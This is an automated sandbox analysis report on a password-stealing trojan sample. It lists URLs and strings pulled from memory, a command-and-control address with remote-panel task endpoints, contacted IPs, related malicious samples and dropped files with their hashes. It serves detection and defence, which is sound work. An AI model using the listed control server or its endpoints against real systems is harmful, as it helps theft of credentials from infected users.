https://api.ip.sb	0%	Avira URL Cloud	safe
https://helpx.ad	0%	URL Reputation	safe
https://helpx.ad	0%	URL Reputation	safe
https://helpx.ad	0%	URL Reputation	safe
http://45.14.13.58:32144	0%	Avira URL Cloud	safe
http://45.14.13.58:3214/	0%	Avira URL Cloud	safe
http://checkip.dyndns.org	0%	Avira URL Cloud	safe
http://tempuri.org/IRemotePanel/CompleteTaskResponse	0%	Avira URL Cloud	safe
https://get.adob	0%	URL Reputation	safe
https://get.adob	0%	URL Reputation	safe
https://get.adob	0%	URL Reputation	safe
http://forms.rea	0%	URL Reputation	safe
http://forms.rea	0%	URL Reputation	safe
http://forms.rea	0%	URL Reputation	safe
http://tempuri.org/IRemotePanel/CompleteTask	0%	Avira URL Cloud	safe
http://crl4.dig	0%	Avira URL Cloud	safe
http://tempuri.org/IRemotePanel/GetSettings	0%	Avira URL Cloud	safe
http://ns.ado/1o	0%	Avira URL Cloud	safe
http://ns.ado/1	0%	URL Reputation	safe
http://ns.ado/1	0%	URL Reputation	safe
http://ns.ado/1	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
ianawhois.vip.icann.org	192.0.47.59	true	false	high
api.ip.sb	unknown	unknown	true	unknown
whois.iana.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://45.14.13.58:3214/	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.dr	false		high
http://service.r	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://icanhazip.com	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmp	false		high
https://duckduckgo.com/ac/?q=	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.dr	false		high
http://www.geoplugin.net/json.gp?ip=https://api.ip.sb/geoipsecuritywaves-exchange	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.datacontract.org	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.ip.sb/geoip	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/envelope/	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	false		high
http://schemas.datacontract.org/2004/07/CONTEXT.Models.Enums	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/envelope/D	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmp	false		high
http://tempuri.org/	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ns.adobe.c/g	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.268740526.0000000008713000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://wtfismyip.com/text	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmp	false		high
http://go.micros	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.ipify.org	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmp	false		high
http://tempuri.org/IRemotePanel/GetTasksResponse	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/IRemotePanel/SendClientInfo	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.interoperabilitybridges.com/wmp-extension-for-chrome	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ns.adobe.c/go	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.256274496.0000000008701000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmp	false		high
http://tempuri.org/0	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ns.adobe.cobjo	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.256274496.0000000008701000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp	false		high
http://forms.real.com/real/realone/download.html?type=rpsp_us	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	false		high
http://support.a	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://tempuri.org/IRemotePanel/GetSettingsResponse	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://45.14.13.58:3214	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://ipinfo.io/ip%appdata%	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp	false		high
http://api.ip.sb	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270752515.0000000002796000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/IRemotePanel/SendClientInfoResponse	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmp	false		high
http://tempuri.org/IRemotePanel/GetTasks	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ns.adobe.cobj	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.268740526.0000000008713000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp	false		high
http://schemas.datacontract.org/2004/07/	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.ip.sb	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://helpx.ad	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://45.14.13.58:32144	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.dr	false		high
http://checkip.dyndns.org	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/IRemotePanel/CompleteTaskResponse	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.dr	false		high
http://bot.whatismyipaddress.com/	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmp	false		high
https://get.adob	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.dr	false		high
http://service.real.com/realplayer/security/02062012_player/en/	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp	false		high
http://forms.rea	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://tempuri.org/IRemotePanel/CompleteTask	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl4.dig	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275112004.00000000058E5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/IRemotePanel/GetSettings	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtabt	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	false		high
http://ns.ado/1o	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.256274496.0000000008701000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.dr	false		high
http://schemas.xmlsoap.org/soap/actor/next	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp	false		high
http://ns.ado/1	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.268740526.0000000008713000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
192.0.47.59	unknown	United States		16876	ICANN-DCUS	false
45.14.13.58	unknown	Netherlands		204601	ON-LINE-DATAServerlocation-NetherlandsDrontenNL	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	356847
Start date:	23.02.2021
Start time:	17:47:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.25862 (renamed file extension from 25862 to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal88.troj.spyw.evad.winEXE@1/21@3/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 5.3% (good quality ratio 5.1%) Quality average: 83.8% Quality standard deviation: 25.1%
HCA Information:	Successful, ratio: 100% Number of executed functions: 139 Number of non-executed functions: 27
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 13.64.90.137, 104.42.151.234, 23.211.6.115, 104.43.193.48, 168.61.161.212, 40.88.32.150, 104.43.139.144, 104.26.12.31, 104.26.13.31, 172.67.75.172, 184.30.20.56, 51.104.139.180, 2.20.142.210, 2.20.142.209, 52.155.217.156, 20.54.26.129, 92.122.213.247, 92.122.213.194 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
17:48:12	API Interceptor	64x Sleep call for process: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
192.0.47.59	8TD8GfTtaW.exe	Get hash	malicious	Browse
	kmU6NKmBPV.exe	Get hash	malicious	Browse
	AHfG1a8jFs.exe	Get hash	malicious	Browse
	ydQ0ICWj5v.exe	Get hash	malicious	Browse
	r4yGYPyWb7.exe	Get hash	malicious	Browse
	aif9fEvN5g.exe	Get hash	malicious	Browse
	ProtonVPN.exe	Get hash	malicious	Browse
	bZ9avvcHvE.exe	Get hash	malicious	Browse
	CmJ6qDTzvM.exe	Get hash	malicious	Browse
	RRLrVfeAXb.exe	Get hash	malicious	Browse
	m3eJIFyc68.exe	Get hash	malicious	Browse
	7E6gDkEV97.exe	Get hash	malicious	Browse
	Dmjsru7tdt.exe	Get hash	malicious	Browse
	5FKzdCQAY0.exe	Get hash	malicious	Browse
	mq28SXD6jb.exe	Get hash	malicious	Browse
	w4XSMSClXm.exe	Get hash	malicious	Browse
	UJuYMehogg.exe	Get hash	malicious	Browse
	ITZ5fvovia.exe	Get hash	malicious	Browse
	BcSLaQV3wf.exe	Get hash	malicious	Browse
	45EUwtDW2Q.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ianawhois.vip.icann.org	SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe	Get hash	malicious	Browse	192.0.47.59
	1vuet1S3tI.exe	Get hash	malicious	Browse	192.0.47.59
	seed.exe	Get hash	malicious	Browse	192.0.47.59
	SecuriteInfo.com.Trojan.GenericKDZ.73123.31244.exe	Get hash	malicious	Browse	192.0.47.59
	8WjU4jrBIr.exe	Get hash	malicious	Browse	192.0.47.59
	8TD8GfTtaW.exe	Get hash	malicious	Browse	192.0.47.59
	kmU6NKmBPV.exe	Get hash	malicious	Browse	192.0.47.59
	AHfG1a8jFs.exe	Get hash	malicious	Browse	192.0.47.59
	ydQ0ICWj5v.exe	Get hash	malicious	Browse	192.0.47.59
	r4yGYPyWb7.exe	Get hash	malicious	Browse	192.0.47.59
	aif9fEvN5g.exe	Get hash	malicious	Browse	192.0.47.59
	ProtonVPN.exe	Get hash	malicious	Browse	192.0.47.59
	bZ9avvcHvE.exe	Get hash	malicious	Browse	192.0.47.59
	CmJ6qDTzvM.exe	Get hash	malicious	Browse	192.0.47.59
	RRLrVfeAXb.exe	Get hash	malicious	Browse	192.0.47.59
	m3eJIFyc68.exe	Get hash	malicious	Browse	192.0.47.59
	7E6gDkEV97.exe	Get hash	malicious	Browse	192.0.47.59
	Dmjsru7tdt.exe	Get hash	malicious	Browse	192.0.47.59
	5FKzdCQAY0.exe	Get hash	malicious	Browse	192.0.47.59
	mq28SXD6jb.exe	Get hash	malicious	Browse	192.0.47.59

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ICANN-DCUS	8TD8GfTtaW.exe	Get hash	malicious	Browse	192.0.47.59
	kmU6NKmBPV.exe	Get hash	malicious	Browse	192.0.47.59
	AHfG1a8jFs.exe	Get hash	malicious	Browse	192.0.47.59
	ydQ0ICWj5v.exe	Get hash	malicious	Browse	192.0.47.59
	r4yGYPyWb7.exe	Get hash	malicious	Browse	192.0.47.59
	aif9fEvN5g.exe	Get hash	malicious	Browse	192.0.47.59
	ProtonVPN.exe	Get hash	malicious	Browse	192.0.47.59
	bZ9avvcHvE.exe	Get hash	malicious	Browse	192.0.47.59
	CmJ6qDTzvM.exe	Get hash	malicious	Browse	192.0.47.59
	RRLrVfeAXb.exe	Get hash	malicious	Browse	192.0.47.59
	m3eJIFyc68.exe	Get hash	malicious	Browse	192.0.47.59
	7E6gDkEV97.exe	Get hash	malicious	Browse	192.0.47.59
	Dmjsru7tdt.exe	Get hash	malicious	Browse	192.0.47.59
	5FKzdCQAY0.exe	Get hash	malicious	Browse	192.0.47.59
	mq28SXD6jb.exe	Get hash	malicious	Browse	192.0.47.59
	w4XSMSClXm.exe	Get hash	malicious	Browse	192.0.47.59
	UJuYMehogg.exe	Get hash	malicious	Browse	192.0.47.59
	ITZ5fvovia.exe	Get hash	malicious	Browse	192.0.47.59
	BcSLaQV3wf.exe	Get hash	malicious	Browse	192.0.47.59
	45EUwtDW2Q.exe	Get hash	malicious	Browse	192.0.47.59
ON-LINE-DATAServerlocation-NetherlandsDrontenNL	MPC-PU-FO-0011-00 .exe	Get hash	malicious	Browse	185.206.215.56
	GUYj2SmNlt.exe	Get hash	malicious	Browse	185.206.212.86
	k2kGj2iF4F.exe	Get hash	malicious	Browse	185.206.212.86
	AOMuUhpLtl.exe	Get hash	malicious	Browse	185.206.212.86
	dAIyRK9gO7.exe	Get hash	malicious	Browse	212.86.114.14
	HpHQe9KGzT.exe	Get hash	malicious	Browse	92.119.113.254
	SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe	Get hash	malicious	Browse	212.86.114.14
	#U10e1#U10d0#U10e4#U10e0#U10d0#U10dc#U10d2#U10d4#U10d7#U10d8.exe	Get hash	malicious	Browse	185.235.130.84
	IMG_222446.doc	Get hash	malicious	Browse	185.206.215.56
	IMG_804941.doc	Get hash	malicious	Browse	185.206.215.56
	tyxCV1ouryr7.exe	Get hash	malicious	Browse	185.241.54.156
	PO 9174-AR.doc	Get hash	malicious	Browse	185.206.215.56
	SecuriteInfo.com.Trojan.Packed2.42783.14273.exe	Get hash	malicious	Browse	185.206.215.56
	P.O 119735.doc__.rtf	Get hash	malicious	Browse	185.206.215.56
	SecuriteInfo.com.Trojan.Packed2.42783.32.exe	Get hash	malicious	Browse	185.206.215.56
	IMG_688031.doc	Get hash	malicious	Browse	185.206.215.56
	file.exe	Get hash	malicious	Browse	185.206.215.56
	file.exe	Get hash	malicious	Browse	185.206.215.56
	Shipping Document PL&BL Draft.exe	Get hash	malicious	Browse	92.119.115.38
	Cena upit AA008957 01-21-2021.doc	Get hash	malicious	Browse	80.89.229.149

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.log Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2599
Entropy (8bit):	5.332456341785073
Encrypted:	false
SSDEEP:	48:MIHK5HKXwYHKhQnogLHqHDfHKdHKBfHK5AHKzvQTHmtHoxHImHKhBHKoHaHZHG1h:Pq5qXwYqhQnogLKTqdqNq2qzcGtIxHbG
MD5:	B3B393A27780DA48DF5CD4FAE3191588
SHA1:	0526E4A07EF053DCB6D5713C4171F1B1063B3359
SHA-256:	AF9812C86F70E2FA3583EF2A2E37D7B7E2D6B2CE73710980E8B48F489AA1AA3D
SHA-512:	3AABD17235B5B5AAACB017450FF9ECFC8F9C4338E0EFC2D55AC40D048266C46A44CA29C825F7E237CABEC1345F60E3F53330ADFFBF411C238D7901CC869637B1
Malicious:	true
Reputation:	low
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\Syst

C:\Users\user\AppData\Local\Temp\tmp2A54.tmp Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp2A55.tmp Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	87165
Entropy (8bit):	6.102565506017432
Encrypted:	false
SSDEEP:	1536:S9sfGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SsfFcbXafIB0u1GOJmA3iuR+
MD5:	CC02ABB348037609ED09EC9157D55234
SHA1:	32411A59960ECF4D7434232194A5B3DB55817647
SHA-256:	62E0236494260F5C9FFF1C4DBF1A57C66B28A5ABE1ACF21B26D08235C735C7D8
SHA-512:	AC95705ED369D82B65200354E10875F6AD5EBC4E0F9FFC61AE6C45C32410B6F55D4C47B219BA4722B6E15C34AC57F91270581DB0A391711D70AF376170DE2A35
Malicious:	false
Reputation:	moderate, very likely benign file
